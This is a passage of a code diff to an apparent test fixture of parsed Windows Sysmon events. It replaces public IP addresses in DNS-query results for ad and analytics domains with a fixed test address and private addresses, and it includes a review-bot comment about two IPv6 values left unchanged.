Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029112900Z'/\u003e\u003cEventRecordID\u003e83\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.500\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eotf.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 iceotf-prod-fe-tm.trafficmanager.net;type: 5 iceotf-prod-fe-eastus.cloudapp.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", 
@@ -2247,7 +2237,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313767748Z", + "ingested": "2021-12-09T13:49:44.739190900Z", "code": "13", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e13\u003c/EventID\u003e\u003cVersion\u003e2\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e13\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-05T14:57:44.726009900Z'/\u003e\u003cEventRecordID\u003e2687\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='5496' ThreadID='876'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='EventType'\u003eSetValue\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-05-05 14:57:44.714\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{5b522f6e-77ae-5eb1-2c03-000000000800}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e6072\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\regedit.exe\u003c/Data\u003e\u003cData Name='TargetObject'\u003eHKU\\S-1-5-21-1067164964-2079179834-2367582738-1000\\Software\\Key 2\u003c/Data\u003e\u003cData Name='Details'\u003eQWORD (0x00000000-0x00000005)\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -2308,7 +2298,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313768938Z", + "ingested": "2021-12-09T13:49:44.739194700Z", "code": "13", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e13\u003c/EventID\u003e\u003cVersion\u003e2\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e13\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-05T14:57:46.818821400Z'/\u003e\u003cEventRecordID\u003e2690\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='5496' ThreadID='876'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='EventType'\u003eSetValue\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-05-05 14:57:46.808\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{5b522f6e-7554-5eb1-6d00-000000000800}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4320\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\Explorer.EXE\u003c/Data\u003e\u003cData Name='TargetObject'\u003eHKU\\S-1-5-21-1067164964-2079179834-2367582738-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{S38OS404-1Q43-42S2-9305-67QR0O28SP23}\\ertrqvg.rkr\u003c/Data\u003e\u003cData Name='Details'\u003eBinary Data\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -2369,47 +2359,47 @@
 },
 "answers": [
 {
- "data": "35.171.101.225",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "34.196.57.87",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "34.194.164.46",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "34.233.181.142",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "34.194.167.169",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "34.193.242.172",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "34.234.152.11",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "34.206.12.124",
+ "data": "89.160.20.156",
 "type": "A"
 }
 ],
 "resolved_ip": [
- "35.171.101.225",
- "34.196.57.87",
- "34.194.164.46",
- "34.233.181.142",
- "34.194.167.169",
- "34.193.242.172",
- "34.234.152.11",
- "34.206.12.124"
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156"
 ]
 },
 "network": {
@@ -2424,20 +2414,13 @@ "ping.chartbeat.net" ], "ip": [ - "35.171.101.225", - "34.196.57.87", - "34.194.164.46", - "34.233.181.142", - "34.194.167.169", - "34.193.242.172", - "34.234.152.11", - "34.206.12.124" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313770065Z", + "ingested": "2021-12-09T13:49:44.739199300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029126300Z'/\u003e\u003cEventRecordID\u003e84\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.580\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eping.chartbeat.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.171.101.225;::ffff:34.196.57.87;::ffff:34.194.164.46;::ffff:34.233.181.142;::ffff:34.194.167.169;::ffff:34.193.242.172;::ffff:34.234.152.11;::ffff:34.206.12.124;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": 
"\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029126300Z'/\u003e\u003cEventRecordID\u003e84\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.580\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eping.chartbeat.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", 
@@ -2496,27 +2479,27 @@
 },
 "answers": [
 {
- "data": "151.101.194.79",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "151.101.2.79",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "151.101.66.79",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "151.101.130.79",
+ "data": "89.160.20.156",
 "type": "A"
 }
 ],
 "resolved_ip": [
- "151.101.194.79",
- "151.101.2.79",
- "151.101.66.79",
- "151.101.130.79"
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156"
 ]
 },
 "network": {
@@ -2531,16 +2514,13 @@ "clarium.freetls.fastly.net" ], "ip": [ - "151.101.194.79", - "151.101.2.79", - "151.101.66.79", - "151.101.130.79" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313771215Z", + "ingested": "2021-12-09T13:49:44.739203700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029148500Z'/\u003e\u003cEventRecordID\u003e85\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.628\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eclarium.freetls.fastly.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:151.101.194.79;::ffff:151.101.2.79;::ffff:151.101.66.79;::ffff:151.101.130.79;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029148500Z'/\u003e\u003cEventRecordID\u003e85\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.628\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eclarium.freetls.fastly.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", 
@@ -2600,39 +2580,39 @@
 },
 "answers": [
 {
- "data": "68.67.178.252",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "68.67.179.11",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "68.67.179.228",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "68.67.178.184",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "204.13.192.141",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "68.67.180.43",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "68.67.179.23",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "68.67.179.197",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "192.5.6.30",
+ "data": "192.168.6.30",
 "type": "A"
 },
 {
@@ -2640,7 +2620,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.33.14.30",
+ "data": "192.168.14.30",
 "type": "A"
 },
 {
@@ -2648,24 +2628,24 @@
 "type": "AAAA"
 },
 {
- "data": "192.26.92.30",
+ "data": "192.168.92.30",
 "type": "A"
 }
 ],
 "resolved_ip": [
- "68.67.178.252",
- "68.67.179.11",
- "68.67.179.228",
- "68.67.178.184",
- "204.13.192.141",
- "68.67.180.43",
- "68.67.179.23",
- "68.67.179.197",
- "192.5.6.30",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "192.168.6.30",
 "2001:503:a83e::2:30",
- "192.33.14.30",
+ "192.168.14.30",
 "2001:503:231d::2:30",
- "192.26.92.30"
+ "192.168.92.30"
 ]
 },
 "network": {
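Review bot: The two AAAA answers `"2001:503:a83e::2:30"` and `"2001:503:231d::2:30"` in the `resolved_ip` array of the `@@ -2648,24` hunk are left as context lines while every IPv4 neighbour is rewritten to `89.160.20.156` or a `192.168.0.0/16` address, so this fixture still carries public addresses that the commit says it is moving to the supported subset; the same two values also survive in the `ip` array and in the `QueryResults` text of the `original` string in the next hunk (`@@ -2680,25`). If this file is regenerated expected output, the change belongs in the corresponding test input fixture with this file regenerated afterwards rather than edited by hand, and it would also be worth a line in the commit description saying why the three `192.x` root-server answers became private `192.168.x` addresses instead of the public subset used everywhere else. The enclosing `dns` object starts and ends outside these hunks.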
@@ -2680,25 +2660,18 @@ "nym1-ib.adnxs.com" ], "ip": [ - "68.67.178.252", - "68.67.179.11", - "68.67.179.228", - "68.67.178.184", - "204.13.192.141", - "68.67.180.43", - "68.67.179.23", - "68.67.179.197", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30" + "192.168.92.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313772374Z", + "ingested": "2021-12-09T13:49:44.739207800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029159100Z'/\u003e\u003cEventRecordID\u003e86\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.633\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003enym1-ib.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData 
Name='QueryResults'\u003e::ffff:68.67.178.252;::ffff:68.67.179.11;::ffff:68.67.179.228;::ffff:68.67.178.184;::ffff:204.13.192.141;::ffff:68.67.180.43;::ffff:68.67.179.23;::ffff:68.67.179.197;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029159100Z'/\u003e\u003cEventRecordID\u003e86\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.633\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003enym1-ib.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;\u003c/Data\u003e\u003cData 
Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -2766,52 +2739,52 @@ "type": "CNAME" }, { - "data": "34.196.86.129", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.233.250.110", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.209.244.108", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.224.204.11", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.237.44.255", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.210.231.21", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.172.198.255", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.199.186.227", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" } ], "resolved_ip": [ - "34.196.86.129", - "34.233.250.110", - "18.209.244.108", - "34.224.204.11", - "34.237.44.255", - "3.210.231.21", - "54.172.198.255", - "34.199.186.227", - "192.5.6.30" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30" ] }, "network": { 
@@ -2828,21 +2801,14 @@
 "eb2.3lift.com"
 ],
 "ip": [
- "34.196.86.129",
- "34.233.250.110",
- "18.209.244.108",
- "34.224.204.11",
- "34.237.44.255",
- "3.210.231.21",
- "54.172.198.255",
- "34.199.186.227",
- "192.5.6.30"
+ "89.160.20.156",
+ "192.168.6.30"
 ]
 },
 "event": {
- "ingested": "2021-10-14T04:10:32.313773584Z",
+ "ingested": "2021-12-09T13:49:44.739211500Z",
 "code": "22",
- "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029240500Z'/\u003e\u003cEventRecordID\u003e87\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.716\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eeb2.3lift.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 us-east-eb2.3lift.com;type: 5 dualstack.engagement-bus-prod-713264365.us-east-1.elb.amazonaws.com;::ffff:34.196.86.129;::ffff:34.233.250.110;::ffff:18.209.244.108;::ffff:34.224.204.11;::ffff:34.237.44.255;::ffff:3.210.231.21;::ffff:54.172.198.255;::ffff:34.199.186.227;192.5.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e",
+ "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029240500Z'/\u003e\u003cEventRecordID\u003e87\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.716\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eeb2.3lift.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 us-east-eb2.3lift.com;type: 5 dualstack.engagement-bus-prod-713264365.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e",
 "provider": "Microsoft-Windows-Sysmon",
 "kind": "event",
 "created": "2019-07-18T03:34:03.029Z",
@@ -2917,11 +2883,11 @@
 "type": "CNAME"
 },
 {
- "data": "108.174.10.14",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "192.5.6.30",
+ "data": "192.168.6.30",
 "type": "A"
 },
 {
@@ -2929,7 +2895,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.33.14.30",
+ "data": "192.168.14.30",
 "type": "A"
 },
 {
@@ -2937,7 +2903,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.26.92.30",
+ "data": "192.168.92.30",
 "type": "A"
 },
 {
@@ -2945,7 +2911,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.31.80.30",
+ "data": "192.168.80.30",
 "type": "A"
 },
 {
@@ -2953,21 +2919,21 @@
 "type": "AAAA"
 },
 {
- "data": "192.12.94.30",
+ "data": "192.168.94.30",
 "type": "A"
 }
 ],
 "resolved_ip": [
- "108.174.10.14",
- "192.5.6.30",
+ "89.160.20.156",
+ "192.168.6.30",
 "2001:503:a83e::2:30",
- "192.33.14.30",
+ "192.168.14.30",
 "2001:503:231d::2:30",
- "192.26.92.30",
+ "192.168.92.30",
 "2001:503:83eb::30",
- "192.31.80.30",
+ "192.168.80.30",
 "2001:500:856e::30",
